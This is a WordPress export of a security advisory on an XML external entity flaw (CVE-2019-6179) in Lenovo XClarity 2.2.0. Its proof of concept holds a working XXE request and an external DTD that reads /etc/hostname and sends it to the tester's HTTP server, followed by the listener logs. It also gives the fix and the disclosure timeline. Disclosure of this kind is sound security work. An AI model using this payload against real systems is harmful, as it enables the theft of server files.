{"id":16617,"date":"2021-07-08T11:29:15","date_gmt":"2021-07-08T09:29:15","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2019-0045\/"},"modified":"2021-07-19T14:11:48","modified_gmt":"2021-07-19T12:11:48","slug":"usd-2019-0045","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2019-0045\/","title":{"rendered":"usd-2019-0045"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2019-0045 | XClarity 2.2.0<\/span><\/h1>\n<p><span><\/span><br \/><strong>Advisory ID<\/strong><span>: usd-2019-0045<\/span><br \/><strong>CVE Number<\/strong><span>: CVE-2019-6179<\/span><br \/><strong>Affected Product<\/strong><span>: XClarity<\/span><br \/><strong>Affected Version<\/strong><span>: 2.2.0<\/span><br \/><strong>Vulnerability Type<\/strong><span>: XML External Entity Processing<\/span><br \/><strong>Security Risk<\/strong><span>: Critical<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.lenovo.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.lenovo.com\/ <\/a><br \/><strong>Vendor Status<\/strong><span>: Fixed<\/span><br \/><strong>Vendor Advisory <\/strong><span>: <\/span><a href=\"https:\/\/support.lenovo.com\/de\/de\/solutions\/len-27805\" target=\"_blank\" rel=\"noopener\">https:\/\/support.lenovo.com\/de\/de\/solutions\/len-27805<\/a><\/p>\n<h3><\/h3>\n<h3>Description<\/h3>\n<p><span>The Appliance has a CIM API listening on port 9090 that is vulnerable to XXE.<\/span><\/p>\n<p><span><\/span><\/p>\n<h3>Proof of Concept (PoC)<\/h3>\n<p><span>Request:<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]POST \/cimom HTTP\/1.1<br \/>\nHost: 10.10.10.4:9090<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nContent-type: application\/xml; charset=&amp;quot;utf-8&amp;quot;<br \/>\nContent-Length: 503<br \/>\nCIMOperation: MethodCall<br \/>\nCIMObject: root\/cimv2<br \/>\nConnection: close <\/p>\n<p>&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot; ?&amp;gt;<br \/>\n&amp;lt;!DOCTYPE CIM [<br \/>\n&amp;lt;!ELEMENT CIM ANY &amp;gt;<br \/>\n&amp;lt;!ENTITY % sp SYSTEM &amp;quot;http:\/\/10.10.80.241\/test.xml&amp;quot;&amp;gt;<br \/>\n%sp;<br \/>\n%param1;<br \/>\n]&amp;gt;<br \/>\n&amp;lt;CIM CIMVERSION=&amp;quot;2.0&amp;quot; DTDVERSION=&amp;quot;2.0&amp;quot;&amp;gt;&amp;lt;MESSAGE ID=&amp;quot;1001&amp;quot; PROTOCOLVERSION=&amp;quot;1.0&amp;quot;&amp;gt;&amp;lt;SIMPLEREQ&amp;gt;&amp;amp;exfil;&amp;lt;IMETHODCALL NAME=&amp;quot;EnumerateInstances&amp;quot;&amp;gt;&amp;lt;LOCALNAMESPACEPATH&amp;gt;&amp;lt;NAMESPACE NAME=&amp;quot;root&amp;quot;\/&amp;gt;&amp;lt;NAMESPACE NAME=&amp;quot;cimv2&amp;quot;\/&amp;gt;&amp;lt;\/LOCALNAMESPACEPATH&amp;gt;&amp;lt;IPARAMVALUE NAME=&amp;quot;ClassName&amp;quot;&amp;gt;&amp;lt;CLASSNAME NAME=&amp;quot;CIM_ComputerSystem&amp;quot;\/&amp;gt;&amp;lt;\/IPARAMVALUE&amp;gt;&amp;lt;\/IMETHODCALL&amp;gt;&amp;lt;\/SIMPLEREQ&amp;gt;&amp;lt;\/MESSAGE&amp;gt;&amp;lt;\/CIM&amp;gt;<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<p><span>Response:<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]HTTP\/1.1 400 Bad Request<br \/>\nContent-Type: application\/xml;charset=\"utf-8\"<br \/>\nContent-length: 0<br \/>\nConnection: close<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n<p><span>Meanwhile on the nc listener:<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]pentester:~\/www$ sudo python3 -m http.server 80<br \/>\nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...<br \/>\n10.10.10.32 - - [24\/May\/2019 15:27:00] \"GET \/test.xml HTTP\/1.0\" 200 -<br \/>\n10.10.10.32 - - [24\/May\/2019 15:27:00] \"GET \/?localhost HTTP\/1.0\" 200  -<\/p>\n<p>Content of test.xml:<\/p>\n<p>&amp;lt;!ENTITY % data SYSTEM &amp;quot;file:\/\/\/etc\/hostname&amp;quot;&amp;gt;<br \/>\n&amp;lt;!ENTITY % param1 &amp;quot;&amp;lt;!ENTITY exfil SYSTEM 'http:\/\/10.10.10.241\/?%data;'&amp;gt;&amp;quot;&amp;gt;<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<p><span>Disable external entity processing in the XML parser if possible or limit accessibility of the API to authenticated users.<\/span><\/p>\n<h3><\/h3>\n<h3>Timeline<\/h3>\n<ul>\n<li>2019-05-27 First contact request via psirt@lenovo.com<\/li>\n<li>2019-09-03 Lenovo Discloses Advisory at https:\/\/support.lenovo.com\/de\/de\/solutions\/len-27805<\/li>\n<li>2019-10-21 First Published<\/li>\n<\/ul>\n<h3><\/h3>\n<h3>Credits<\/h3>\n<p><span>This security vulnerabilities was found by Tobias Neitzel of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2019-0045 | XClarity 2.2.0 Advisory ID: usd-2019-0045CVE Number: CVE-2019-6179Affected Product: XClarityAffected Version: 2.2.0Vulnerability Type: XML External Entity ProcessingSecurity Risk: CriticalVendor URL: https:\/\/www.lenovo.com\/ Vendor Status: FixedVendor Advisory : https:\/\/support.lenovo.com\/de\/de\/solutions\/len-27805 Description The Appliance has a CIM API listening on port 9090 that is vulnerable to XXE. Proof of Concept (PoC) Request:POST \/cimom HTTP\/1.1 Host: 10.10.10.4:9090 Accept-Encoding: gzip, [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16617","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16617","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16617"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16617\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16617"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}